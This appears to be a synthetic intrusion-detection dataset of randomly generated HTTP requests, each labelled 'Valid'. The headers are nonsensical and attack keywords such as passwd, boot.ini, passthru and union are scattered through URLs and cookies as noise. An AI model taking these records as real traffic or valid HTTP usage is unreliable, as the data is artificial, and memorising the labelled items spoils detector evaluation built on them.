Upgrade: ra0Hnd/6.8, eyae/3.6, Irhtn/4.9, eltrm/8.5, ilhi/1.9
Warning: 140 www.ner7.gif:28 "tvurexwIb0Sdxnss3ae" 
X-Forwarded-For: 128.144.152.215
X-Serial-Number: 27219
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

l5eent8ds3o1ij=3body&ed5mt5ue7ahsyu=he1to&esiT=wtmp>uua~acceptar]r a&yye=otu&ctGae=suf

End - Id: 6256
Start - Id: 34426
class: Valid
POST /c4eomwplye5ni/rXQ@3YXg9doSRRHdov/eliqsaauagaoT/lYwL_OQQ/lz8LaknUetr.jpeg? HTTP/1.0
Content-Length: 133
Content-Language: h,fcY,r
Content-Encoding: deflate
Content-Location: http://www.onaf1.fr/fdiceaE/hcr6s/eo9iet/mtho.tiff
Content-MD5: YWVwM2VpbWd0MWVpdHRsag==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 29 Feb 08 04:46:24 UTC
Last-Modified: Wed, 26 Oct 05 10:29:15 CET
Host: www.7btswrEy.com
Connection: a92o
Accept: text/*, image/gif
Accept-Charset: utf-7;q=0.7, x-mac-ce;q=0.3, iso-8859-2;q=0.2, windows-1253
Accept-Encoding: compress;q=0.9, compress, compress;q=0.3
Accept-Language: *;q=0.0
Cache-Control: zzo='gcSmb'
Client-ip: 229.83.165.165
Cookie: e6ulI4eho=50662454;BNmn= fesa~lrjinputcnbn]nih
Cookie2: $Version="5"
Date: Fri, 05 Nov 04 12:31:53 GMT
ETag: W/"klRyVC@w2mtJQIc5LX"
Expect: dyig0i9=6sBoLdsl;yRsosfta=lSdeldl
From: uvzad@jaoeradkfe.uk
If-Modified-Since: Mon, 24 Nov 08 05:15:08 GMT
If-Unmodified-Since: Mon, 30 May 05 17:59:57 GMT
If-Match: *
If-None-Match: "HCfJ-mzZLTO0GIfIcr"
If-Range: Sun, 02 May 04 22:53:41 GMT
Max-Forwards: 4526
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: if1e8w idii=psa0
Authorization: tondie Eazlxi=ueeytl2
Range: -2,-34,732-
Referer: http://tgoc5a.st/ntt3oO/fix2/VvhncNs/aayags.zip
TE: trailers,gzip
Trailer: Warning
User-Agent: Mozilla/4.9 (compatible; MSIE 5.6; Open BSD i386; yecdc8)
UA-CPU: StrongARM
UA-Disp: 7247,384,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 840x4922
Via: berm/2.7 180.4.167.59, FTP/3.4 168.205.81.50
Transfer-Encoding: gzip
Upgrade: nnygpo/3.3, eaI/0.2, rgsu/5.5, tsO/7.9, rdq/5.4
Warning: 076 www.tlWems.gif "aretamgt" 
X-Forwarded-For: 229.28.6.246
X-Serial-Number: 22221039836
----: -----------
~~~~~: ~~~~~~~~~~~~~~

rfteowpchht=ettmphtpass4civbscriptbnulltea&dvsfn5Sce5l=yxCm.&tt7Me=tlib zt&e0nNunrdji=uii&Un6daw0ru3eIre=nPY_xSmaKxK&Ei2kksnian2=eweg

End - Id: 34426
Start - Id: 29979
class: Valid
GET /na/hacrr5il/YpsB2I4bgsoundUxJ/yradstonj2rh4yi6i/pta9vd9pmAsashe/WBiframejsgPvYV/e4T-SviJAlVR@pgwpeW/wp-sswmT@includeTsV/deH365dnj/wf7hGx4B/nrsolcc5n3.jpg? HTTP/1.0
Host: 6.186.161.191
Connection: ssLEnl
Accept: */*;q=0.7
Accept-Charset: cp-950;q=0.7
Accept-Encoding: compress, identity, compress;q=0.8, identity
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 26.168.29.0
Cookie: aho=steurRr;connecthtaccesW1M8tlsWY=forpi
Cookie2: $Version="308"
Date: Mon, 09 Feb 04 14:50:23 CET
ETag: "bibmdyuKcRpl1LGBjwPa"
Expect: oAlen
From: nAen2Ew@Xo7tyav4o.biz
If-Modified-Since: Tue, 18 Mar 08 05:02:17 CET
If-Unmodified-Since: Thu, 08 Feb 07 08:42:16 CET
If-Match: "gvqDR42OJtwL3-A"
If-None-Match: *
If-Range: Wed, 05 May 10 18:34:51 CET
Max-Forwards: 9671
MIME-Version: 0.1
Pragma: petaevi='al'
Proxy-Authorization: rrrf natgEri=u7aTNgi8
Authorization: NTLM Y29zaHJycnR6YTF5aG5hY25laFRySXV3dGVndHRIQWVyZXh1dA==
Range: 89712-
Referer: /i0t3/0yz7eet.png
TE: deflate,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/2.3 (compatible; Konqueror/7.5; Open BSD i386; h2eedcrt)
UA-CPU: 68000
UA-Disp: 644,8528,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 912x832
Via: 2.2 122.181.119.8, 4.7 22.150.168.9
Transfer-Encoding: wwrgi
Upgrade: eds/9.2, isa/3.3, kej/9.4
Warning: 929 111.138.94.34 "fYos2dhjediq09q9ela" "Sun, 20 Sep 09 07:36:42 GMT"
X-Forwarded-For: 69.246.154.213
X-Serial-Number: 2857393
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29979
Start - Id: 8225
class: Valid
GET /SnR_x4b/styleA8SM69/60zbv8vdHwA@d02/kbBL-ADC8mmQxy21n/Bwg9gc/e05DGmkUwhZ10nBiMj/zNQMCY1fZo_/0VM.htm?reko1ec=nAse5cSvvt%3E%5C&swt=%3A%3CdocumentS&2hetgurv=psehnnigeaS8scr&efinu=44330&keQ.eNf=Ie%282nTiqh%3Dre%25location1rmUi&ltresdoysriNh=samaE&iep7apieeIyyh=914554&rNeeolv5laa2slV=sn5es-pb&H6odcheOs9iceAg=Saad&9tljiurouetTsty=tIT.my HTTP/1.0
Host: www.soeaa.cz
Connection: close
Accept: */*;q=0.4
Accept-Charset: euc-jp;q=0.9, windows-1251;q=0.4, macintosh;q=0.5, shift_jis, iso-8859-6;q=0.7
Accept-Encoding: 
Accept-Language: nefspn-n;q=0.7, Ao-tt3ionts;q=0.8, ade-sesshbio;q=0.0, htheshta-slp;q=0.0
Cache-Control: no-store
Client-ip: 30.130.64.241
Cookie: aZv-B14=53604;ANrnnanVee6bot=fCanaiaLeenen ;seocodoe3tieeMi=rVfBX39jYs;zdftaAlagiE=ehvfcvj1ys2
Cookie2: $Version="869"
Date: Thu, 20 Apr 06 17:15:19 UTC
ETag: W/"6Yal4L@TVxr.WUoqs"
Expect: 100-continue
From: naraez2@nbaeit.cz
If-Modified-Since: Fri, 04 Mar 05 07:37:54 CET
If-Unmodified-Since: Fri, 11 Feb 05 10:33:35 UTC
If-Match: "1-1aWaerUVjx-cw2T"
If-None-Match: *
If-Range: Fri, 24 Nov 06 18:16:57 UTC
Max-Forwards: 5
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Basic dWVjaGFvOjBpeWFl
Authorization: Digest algorithm=MD5-sess
Range: -164292,-5
Referer: http://I2gr6.org/ppeSi/kte3rtun.nsf
TE: trailers,gzip,trailers
Trailer: Pragma
User-Agent: ejpPTl (txvPBz_LC; rxjuuPOQ)
UA-CPU: Sparc
UA-Disp: 260,910,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 794x905
Via: 4.7 36.49.175.212:14, HTTP/9.8 115.189.242.212, HTTP/8.5 www.ndeaNzc.js
Transfer-Encoding: gzip
Upgrade: ib6Ex/5.7, aZse/0.7
Warning: 252 www.aUro.css "eearwsr7" 
X-Forwarded-For: 176.93.53.162
X-Serial-Number: 9806136470509307613
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8225
Start - Id: 28882
class: Valid
GET /w7P4Gw-hY1Bmhv.asmx?sqasqnrebo7dB4D=5 HTTP/1.1
Host: 78.32.7.98
Connection: keep-alive
Accept: text/xml;q=0.6, text/*, video/*;q=0.0
Accept-Charset: iso-2022-kr;q=0.2, x-mac-icelandic, iso-8859-6;q=0.0, windows-1252;q=0.7, windows-1254;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 184.178.162.162
Cookie: klo8.Olikep=ma;24pZpcP-b=36642;efnQztfaeso=mTrsOch7-8b0dldu;fnaltefe=1270;trhe=stEU 6 tlsme3;aeoe3Cnee2h9tnv=uedpmiaolnurmotoHm
Cookie2: $Version="66"
Date: Tue, 09 May 06 14:56:59 UTC
ETag: W/"08OfWCGUYYg7aGs_@hp"
Expect: 100-continue
From: 4zbw@syof.net
If-Modified-Since: Mon, 22 Sep 08 08:43:50 UTC
If-Unmodified-Since: Tue, 25 Sep 07 12:10:17 UTC
If-Match: *
If-None-Match: "GepjJMfN-_IVRV1KiIxV"
If-Range: Mon, 24 Jan 05 22:33:52 GMT
Max-Forwards: 5
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: ahhr s0Fl=8rco0ere
Range: 0-78,-19014
Referer: /eFe8pnE/nobsiiSd/yoivaAn.png
TE: deflate;q=0.5,trailers
Trailer: If-None-Match
User-Agent: uhrpzplne/3.4.0.6.7
UA-CPU: x86
UA-Disp: 647,902,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 122x5513
Via: 1.3 www.8ezl3.tiff, FTP/2.6 www.wnfiaoO.css, 8.0 42.41.246.106
Transfer-Encoding: deflate
Upgrade: sippk/3.0, sieesd/6.3, eUhlW/5.4, r57ml/6.9, oriie/9.1
Warning: 683 133.125.37.48 "2t0sroNh62q" 
X-Forwarded-For: 160.62.173.241
X-Serial-Number: 687925565922143
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28882
Start - Id: 30697
class: Valid
GET /assCfkmqoBibatsyri/n-CV2a1IpS75FLXnh.exe?inputorGTh4B8=3 HTTP/1.0
Host: 188.219.197.202:80
Connection: 9nnT
Accept: video/quicktime;q=0.2, audio/basic;q=0.3, application/*
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.4
Accept-Language: o2t-ajny, 30wt-p4hn6z;q=0.7
Cache-Control: no-store
Client-ip: 188.252.4.241
Cookie: eaosihfwRch=4740;-sk5=exwNW9E;vietnirt=3796459690;mvA5t7kac=aretbol
Cookie2: $Version="2"
Date: Mon, 19 Jan 09 20:13:11 UTC
ETag: W/"aR0XKp0GV0OmR3jxMqV"
Expect: 100-continue
From: aeec@eeAs.fr
If-Modified-Since: Mon, 06 Dec 04 13:05:39 UTC
If-Unmodified-Since: Sun, 06 Jun 04 17:16:42 CET
If-Match: "xhnrNB3VlH.n@PBb3"
If-None-Match: *
If-Range: *
Max-Forwards: 8921
MIME-Version: 7.4
Pragma: iEpveid=iake
Proxy-Authorization: Digest response="2A65cd9EabBC61E562DdDFBfeDaAebf9"
Authorization: Basic bWlkUzp0YW9hbDZrcw==
Range: -254
Referer: http://www.6liz5e.gov/oish1/gtnn9/dR7hlty/do4o/elha.wmn
TE: gzip,trailers
Trailer: Upgrade
User-Agent: fa4n (hsh.@lGO; fTK8PGOmw)
UA-CPU: 68000
UA-Disp: 9503,087,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 7462x1873
Via: 0.0 246.186.11.118, 6.6 www.oyielse.tiff, HTTP/7.5 www.saoAapc.gif
Transfer-Encoding: hioh
Upgrade: caib/8.0
Warning: 498 www.sep0d.js "fbed2" 
X-Forwarded-For: 229.134.94.56
X-Serial-Number: 62673072943112918
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30697
Start - Id: 32613
class: Valid
PUT /ene/oW0fCvQOo4/dtl4s0/dropiqMsBCo/sxvV0QBdbttWj_9HpL0V/rOj_Fx.cgi? HTTP/1.1
Content-Length: 113
Content-Language: ioo3aen
Content-Encoding: compress
Content-Location: /nnzte.aspx
Content-MD5: c2NoaDFoN2xmd25vdHJwcw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 24 Oct 05 09:22:53 UTC
Last-Modified: Wed, 17 Nov 04 21:41:19 GMT
Host: www.Ltblavil.biz:4652
Connection: close
Accept: */*;q=0.5
Accept-Charset: cp-950;q=0.1, isiri-3342;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 163.113.91.254
Cookie: ivwbnNb=p5uimopens 
Cookie2: $Version="949"
Date: Wed, 25 Nov 09 18:55:33 GMT
ETag: "6XJvegWMaBXyXdEP"
Expect: csEol9sq
From: mhhvcrm@gtad.de
If-Modified-Since: Wed, 15 Aug 07 13:01:03 GMT
If-Unmodified-Since: Sun, 13 Mar 05 06:26:36 GMT
If-Match: "vmxxUm8eOKVqJ3w"
If-None-Match: "Rrtp22Q-ua_MBBqy3N-_"
If-Range: Fri, 30 Jan 04 10:55:40 UTC
Max-Forwards: 55
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: adtt9 cssas=aamp
Authorization: Digest nc=cEedddD0
Range: 09-
Referer: http://otv3sk3.biz/tc9srCL.asmx
TE: chunked;q=0.0,trailers
Trailer: Referer
User-Agent: iiNomSeG http://www.wvror.uk
UA-CPU: PowerPC
UA-Disp: 010,8436,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 2740x572
Via: 2.7 45.33.67.29
Transfer-Encoding: identity
Upgrade: 0ss/3.7, rol/6.4, t7a/3.1, oeOo/5.0, iui/8.8
Warning: 600 www.oeyQ.gif:6 "MqLrrRse4tmzoe" 
X-Forwarded-For: 64.19.200.199
X-Serial-Number: 73155166220455300
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

g6goc0wan0hx=02266&rvJH_OMVK=03855&documentFHXZVa=1544281&mncfe3P=r4Satm&o7ea8=;9&mwtht=?g[3lesebweyie dtiO

End - Id: 32613
Start - Id: 12561
class: Valid
GET /5u5eblMtetdtrivt/Tro/wUP/system-4UUQ4Wvbscript/enj0TAMJt6.mspx?ider=s3m%3C&aoueyxtluitq4=n5o&aht7=nelsModh+body&aIns=dmS7ez7&3Uaewatnjm=atss&beiSbedoton=adminHenSautoexec&wdu1mtA=le%3D&4ZddUijriSee=at%3Doimgnzo3libreplaceolrnasamexecto HTTP/1.1
Host: www.Aie9war.gov
Connection: close
Accept: video/mpeg;q=0.5
Accept-Charset: x-mac-turkish, x-mac-turkish;q=0.8
Accept-Encoding: 
Accept-Language: ooHonon-let, wil-dB, hwzreanh-eimfs, rodei-ohc;q=0.9, od0R9ir-utcamitr
Cache-Control: no-cache
Client-ip: 157.23.61.107
Cookie: ehtesegdae=erDj;sr=r  wp-'na3an;mu0UiW7=4654
Cookie2: $Version="91"
Date: Fri, 01 Aug 08 12:41:12 UTC
ETag: W/"H8QW.ECYlsVSh.Lsv"
Expect: t5msite
From: dS1i@dHcupdftec.biz
If-Modified-Since: Mon, 19 Mar 07 09:53:30 GMT
If-Unmodified-Since: Sat, 07 Nov 09 11:45:30 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 03 Oct 08 11:05:13 UTC
Max-Forwards: 6630
MIME-Version: 8.2
Pragma: ie=nf
Proxy-Authorization: Digest cnonce="iCAy"
Authorization: NTLM T3NjaWd0cnNJMG90ZHJ0cWVoNXRvOG5kN3Q2YWRmaWRibHdkdFNpdXNlZ29zem8=
Range: 86503-,-067547,349937-
Referer: /onnmsw/tet1u6r/ooiamt.jpg
TE: trailers
Trailer: If-None-Match
User-Agent: d4dchE8dtvgao
UA-CPU: 68000
UA-Disp: 3658,3398,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 366x415
Via: FTP/0.8 217.161.150.156, 9.4 241.228.140.23, FTP/7.4 www.oqchm.gif
Transfer-Encoding: gzip
Upgrade: a1e0oe/8.1, dhoae/6.1
Warning: 997 www.ce9up3.htm "ertyen49aeinh" 
X-Forwarded-For: 134.103.218.48
X-Serial-Number: 3472507595174879
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12561
Start - Id: 18575
class: Valid
GET /nDBFz89Vfs/jZ5AYQc-oDZ42/_CQN1/eboUodxdotn5r/MtEaii.pl? HTTP/1.0
Host: www.arctaOp.st
Connection: mauaturh
Accept: */*;q=0.7
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: ha0eeais-a, nc-itgbtlzu, a-h
Cache-Control: no-transform
Client-ip: 82.193.57.231
Cookie: Xooce=0p6e6e;iavwyHsWlhlo=j(ug;NrnaihaymRgk=childvq ~hi%dstylehrtnetcatsqgskn;vTsM=571
Cookie2: $Version="394"
Date: Sun, 09 Aug 09 02:40:20 CET
ETag: "seZrZcY201BJTWfCzn"
Expect: 100-continue
From: tyie@t8hupt4y.biz
If-Modified-Since: Tue, 22 Nov 05 12:17:37 UTC
If-Unmodified-Since: Sun, 29 May 05 18:35:24 GMT
If-Match: *
If-None-Match: "E0Q6LxCaHslUGrB"
If-Range: *
Max-Forwards: 7
MIME-Version: 3.4
Pragma: nosbnmAt='v5ttbe'
Proxy-Authorization: NTLM ZXB1ZWJyZXJlb29jVmk1c2VocnRUYW9kdGdsdHJ0ZmVsbkd0
Authorization: NTLM aXNFZHRsZXUxeGxmTmVlaXMwRXJnb25mZnJscmRyaHV0
Range: -49105,7-,-99029
Referer: /uiktlS62/Pbecnn/EiBe4Rt/v7Ail/nIrOe1g.wmn
TE: trailers,gzip
Trailer: Upgrade
User-Agent: Mozilla/6.1 (Windows; U; WinNT 9.8; sa-ad; rv:6.2.8) Gecko/81675432
UA-CPU: StrongARM
UA-Disp: 973,9699,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 924x1764
Via: 9.7 96.121.160.179:00496
Transfer-Encoding: deflate
Upgrade: fsooht/0.4, Rtho/8.1
Warning: 223 151.230.160.155 "9e8eoa0eiupts" 
X-Forwarded-For: 81.60.123.231
X-Serial-Number: 5275417483977
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18575
Start - Id: 34384
class: Valid
POST /JnptNcktWra5toe/aohdndc1ce/tvuC12Ih-TinE/ldajegmOtsa4uy/gUdg6sXK0trqMdK/if/iInK4perl.php4? HTTP/1.0
Content-Length: 114
Content-Language: tnyo,o,edLi
Content-Encoding: identity
Content-Location: /7DoiVei/pd4vnu.aspx
Content-MD5: b2thbHNtQWZmaE9laXJsaA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 04 Dec 04 21:04:50 UTC
Last-Modified: Sat, 09 Jul 05 01:25:18 CET
Host: www.lriiehhddh.st
Connection: close
Accept: application/*, audio/*;q=0.4, video/*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: xoasx-aem;q=0.1, t9ps-pgava;q=0.4, xrotun-o
Cache-Control: s='7Ht'
Client-ip: 135.87.113.152
Cookie: lahfdNugsTltee=1lzktof
Cookie2: $Version="524"
Date: Sun, 28 Oct 07 20:35:04 GMT
ETag: W/"2XTGxtvNtQS07di_dd"
Expect: coehc
From: t2ao3Tim@5hsAsESuu.biz
If-Modified-Since: Mon, 21 May 07 02:37:08 CET
If-Unmodified-Since: Tue, 15 Feb 05 20:40:27 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 21 Dec 06 11:05:04 CET
Max-Forwards: 84
MIME-Version: 7.0
Pragma: n=tde
Proxy-Authorization: NTLM c29vb2ZTUGlmbWw0YWlvZXNIaG90YUhkb2phaW8ybTBVd2FjaQ==
Authorization: Basic cnVMaGk6aWVlMQ==
Range: 369-272,49-76042
Referer: http://Ttawd.uk/eosale/nae6smLE/cmoelts/lnenl/Eutri5t.mpeg
TE: chunked,chunked,chunked;q=0.7
Trailer: Upgrade
User-Agent: Mozilla/6.3 (compatible; Konqueror/9.2; Linux i386; rbNpnnzn; ussew4bao)
UA-CPU: x86
UA-Disp: 404,187,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 4677x6242
Via: HTTP/2.0 www.rHvtaNa.htm:079, FTP/1.4 www.itarote.gif, FTP/6.5 www.oze8bp.js
Transfer-Encoding: deflate
Upgrade: hel/4.7, fZt/1.0, fhio/0.4, psutsa/0.4, YhVAtt/6.7
Warning: 677 229.121.18.11 "Uhwoabeh" "Mon, 27 Aug 07 06:46:16 UTC"
X-Forwarded-For: 107.108.232.99
X-Serial-Number: 71981796445551996576
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~

nsah=%7CtIhtaccesSRw%288%5Bopendthe%3B&d2M=7814518&kdepmGQcZPFN=400400164&se=266431&N%uPb=enfblnO36ESe&oBe2yluI=09

End - Id: 34384
Start - Id: 28058
class: Valid
GET /tiT4RDmYewOshiddD/o9EYEVqiS5/enyealeibpfhdie/IVEform6TYs24mail3@WC/xatonermofsaozre8at.sh?npteel=822&nIahe=dohymt6uh3dtt9Er&mrrUlh=e146Ub6.p&WsRFj=exox06z%40t&enliyoa=Alog&fnvznVJrmZB=6&wtcdohmhARtrh=81122&gu3iedj=l.of.4N9C&Ufaswihbuneek=99581745&AOvarxc=a33uFPQ3&sdbea=mihhoelhAehE HTTP/1.0
Host: www.hdk9oroo.ch
Connection: close
Accept: video/*
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.6
Cache-Control: max-stale
Client-ip: 106.176.170.46
Cookie: 9processing-instructionDaSB1Fg=jnullboot.ini]doa$;qOord1kOK3=~e
Cookie2: $Version="63"
Date: Sun, 12 Jul 09 21:29:08 CET
ETag: W/"8jQIu9B@UcxUE_Ne"
Expect: ansis
From: gu9cDaia@ar6it9.st
If-Modified-Since: Sat, 22 Jan 05 19:26:34 CET
If-Unmodified-Since: Fri, 07 Dec 07 04:10:50 UTC
If-Match: "C-1kFzBaGkMwwe6jO"
If-None-Match: *
If-Range: Fri, 28 May 04 19:55:07 UTC
Max-Forwards: 0122
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Basic dW5uYzp6b2NhRFRl
Authorization: Digest algorithm=MD5-sess
Range: -570
Referer: http://avrdrpmq.st/Ow0bee/ieps.jpeg
TE: chunked;q=0.4
Trailer: Host
User-Agent: Mozilla/5.0 (X11; U; Linux i586 0.0; n6-ed; rv:4.9.9) Gecko/73341423
UA-CPU: StrongARM
UA-Disp: 352,634,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 2111x3686
Via: 7.6 211.135.153.24, 5.2 www.foUtfElx.gif, 4.2 www.hnbTwh.tiff
Transfer-Encoding: identity
Upgrade: mt50n/6.1, frlaru/6.7
Warning: 759 www.rcgyueh.tiff:5 "wolidasoknadsaeahf" "Sun, 27 Jul 08 14:28:37 UTC"
X-Forwarded-For: 140.27.28.161
X-Serial-Number: 981815102258
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28058
Start - Id: 10335
class: Valid
GET /oSe/et1ci/4j/ibL8ndoIirpqtk/omyt/1tmfcutwnoioi/eX6G_/4iiyoexpesmeeF2joei/ysdvnaN/ggBoos0oetzc/6wfhEFd.asp?mWaMEimgu_H=64861427&igewotvfv4e=eus%26nr4a2tznp-t&c6Ew1lr=nwhereA7metasxp_e%3E9n&ib=atadbou3u&ihltopy90bre=7690&hiahogmtnlsatc=e7c&vwAoarqgEilenrt=jbrATrgroup+bypea&gdldsnm=+%3B&nw1ioctrmAtb=9&2roo=eo%40&denrneoehh6e0=1runioncsc&eRehns2SvRt6i=-&Sikete3trRe=9130&lnuieuddgh=Eo2ezeIxdtS HTTP/1.1
Host: www.agg8dtaa.gov
Connection: close
Accept: */*;q=0.9
Accept-Charset: x-mac-cyrillic;q=0.0, utf-8;q=0.8, gb2312;q=0.6
Accept-Encoding: 
Accept-Language: sp-nv5sicl;q=0.4, sair-H, nrh8s-rew;q=0.9, i8iktuxS-n;q=0.1, feas-omra9mo;q=0.5
Cache-Control: only-if-cached
Client-ip: 245.83.65.213
Cookie: 6EvdtelnetfR=$no<9f;oAULoiIm6W=58347;7dT=ahe-edrc>cwindow.opene |%form
Cookie2: $Version="56"
Date: Sat, 10 Sep 05 16:44:06 UTC
ETag: "3Yi_O@QR-K95d5f5x0m"
Expect: jfnenaon
From: rnwbd@hfers8.cz
If-Modified-Since: Sun, 08 Aug 04 02:41:26 CET
If-Unmodified-Since: Sat, 02 Aug 08 19:36:22 GMT
If-Match: *
If-None-Match: "s79Y00fBfq5Xl5Dq2oy"
If-Range: Thu, 29 Nov 07 14:27:05 UTC
Max-Forwards: 699
MIME-Version: 8.0
Pragma: h=dahyynpF
Proxy-Authorization: NTLM bm52ZXVGYzJvdGloNWh5bXRhb3NpdG9mdnJhdHNSaWE=
Authorization: Basic ZWR0aEFzNDpzc25pYmFtbg==
Range: -363185
Referer: http://ee1hz.st/ailneew/dKxsusm/s68W/nEsaeuse/mt4clUo.txt
TE: deflate,chunked;q=0.2,trailers
Trailer: Via
User-Agent: piytrwih (etSdP8; mwm2fFT; b_Koo.9G; eym@Enmy6)
UA-CPU: PowerPC
UA-Disp: 2081,300,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 7424x1666
Via: aNbjug/8.6 www.iNt1f.shtml
Transfer-Encoding: uxHd
Upgrade: ssIo/9.2
Warning: 024 www.tc2e.jpg:11233 "btieehdprxtrsee" 
X-Forwarded-For: 180.232.254.90
X-Serial-Number: 780593
----: ------------
~~~~~: ~~~~~~~~~~

null

End - Id: 10335
Start - Id: 1985
class: Valid
GET /nM/om0ttEOLn/fYoz-26AO@.1/a5iqoaSnXKG@L.YHRdZ/ty1passwd/yndtmseipiaihEu.nsf?s3s=%25nN%2Fasg6lg&OrfwUa=375299 HTTP/1.1
Host: 140.251.73.247
Connection: close
Accept: video/quicktime;q=0.2
Accept-Charset: *;q=0.2
Accept-Encoding: compress, deflate, compress;q=0.4
Accept-Language: *
Cache-Control: max-stale
Client-ip: 31.188.128.30
Cookie: se=n/i;ePtvaieihrae=2603937;U-jsock_stream4Na=6766772;atnr3icdnnte=Eqt1kszrha7taegmsR;n6aeh0lEotimi=|-
Cookie2: $Version="3"
Date: Thu, 07 Feb 08 20:34:01 CET
ETag: "Lq7BD74AR4vC5.PARo5R"
Expect: smnN
From: tlvajp@oiboillauo.de
If-Modified-Since: Mon, 08 Dec 08 24:44:39 GMT
If-Unmodified-Since: Mon, 30 Mar 09 04:37:34 UTC
If-Match: "qJVo-.zTH6eoRjpaM"
If-None-Match: *
If-Range: Fri, 07 May 04 01:16:20 CET
Max-Forwards: 17
MIME-Version: 6.0
Pragma: bae='i'
Proxy-Authorization: Digest realm
Authorization: Digest nc=AB108426
Range: 9726-,-403498,8792-
Referer: /ndtth/tNuu/krmsV/6nceWhNi/EEsEnu.asmx
TE: trailers,trailers
Trailer: Expect
User-Agent: eot8.mkq http://www.epne.ch
UA-CPU: Sparc
UA-Disp: 348,029,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 396x457
Via: 1.6 www.an6Mdhsn.gif, HTTP/2.8 58.108.47.45
Transfer-Encoding: identity
Upgrade: icjnho/3.6, diut9V/0.7, atedi/1.4
Warning: 881 201.232.1.60 "LvritattEe" "Tue, 06 Jan 04 03:25:52 UTC"
X-Forwarded-For: 218.173.209.61
X-Serial-Number: 189729230
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1985
Start - Id: 9345
class: Valid
GET /_x1a/hwmwtmrly/s6/oDQVy4nn-di5ZcWvb.f.jsp?atntmiueaeett=071&B6@_Ru9IP=f+etnaopassthruihw%251%5Bh&BmuedE=256634654&bAgslH1lib=6te+tn6susrc&@Mwp-uFVWN.=droiseAipnapt&eensllE2p7m=4837266&lAatnmplLp0a=863916 HTTP/1.1
Host: 4.235.252.222
Connection: close
Accept: image/jpeg;q=0.6
Accept-Charset: *;q=0.3
Accept-Encoding: gzip;q=0.0
Accept-Language: *
Cache-Control: no-store
Client-ip: 216.113.175.44
Cookie: ema=25976;norvi=64144779;eanutmo=bKKZGo2E;50estooaa0lh=bktYmVXWHG;w9of=59521825;dsg=(EEe<bn]pls5ghif3cmdboot.inie
Cookie2: $Version="05"
Date: Tue, 23 Jun 09 14:50:48 UTC
ETag: "Q4zv0qBIQ9MeBPd1ss2"
Expect: gEwhEed=lqmenxb
From: hwtSu76@kdazi.net
If-Modified-Since: Mon, 27 Oct 08 03:05:44 GMT
If-Unmodified-Since: Mon, 05 Jun 06 04:08:38 UTC
If-Match: ".-p0TSfzveXjqr1Z@2WI"
If-None-Match: *
If-Range: *
Max-Forwards: 838
MIME-Version: 3.5
Pragma: eseXs='pams'
Proxy-Authorization: ud0w tNdb=terh
Authorization: iesOf ie4s2=zr6co5
Range: -41,91189-8,552-
Referer: /eteTsMfo.txt
TE: gzip;q=0.1
Trailer: Accept-Charset
User-Agent: Mozilla/5.8 (compatible; MSIE 9.1; Open BSD i586; utu9d)
UA-CPU: 68000
UA-Disp: 4558,749,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 4908x484
Via: 5.9 www.yn9dls.tiff, 8.6 www.iaitn.jpg, 1.7 198.97.236.123
Transfer-Encoding: compress
Upgrade: iwh/2.5, obqr/2.1
Warning: 709 17.102.2.9 "acKn" 
X-Forwarded-For: 135.104.235.17
X-Serial-Number: 547937041185826095
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9345
Start - Id: 2734
class: Valid
